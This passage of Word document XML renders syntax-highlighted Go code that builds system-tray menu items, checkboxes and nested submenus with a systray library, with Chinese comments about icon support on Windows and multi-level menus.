        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">mChecked </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>AddMenuItemCheckbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Unchecked"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Check Me"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">mEnabled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>AddMenuItem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Enabled"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Enabled"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>// Sets the icon of a menu item. Only available on Mac.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>上一行原注释错误，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>可以正常显示该菜单内容的图标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mEnabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetTemplateIcon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>AddMenuItem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Ignored"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Ignored"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>多级菜单，连环套</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">subMenuTop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>AddMenuItem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"SubMenuTop"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"SubMenu Test (top)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">subMenuMiddle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>subMenuTop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>AddSubMenuItem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"SubMenuMiddle"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"SubMenu Test (middle)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">subMenuBottom </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>subMenuMiddle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>AddSubMenuItemCheckbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"SubMenuBottom - Toggle Panic!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
